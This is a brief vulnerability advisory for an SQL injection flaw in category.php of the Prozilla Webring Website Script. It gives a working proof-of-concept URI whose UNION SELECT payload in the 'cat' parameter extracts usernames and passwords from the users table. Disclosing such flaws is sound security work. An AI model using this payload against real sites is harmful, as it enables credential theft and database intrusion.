Prozilla Webring Website Script Category.PHP SQL Injection Vulnerability

Prozilla Webring Website Script Category.PHP SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/Script_Dir/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5/**/FROM/**/users/*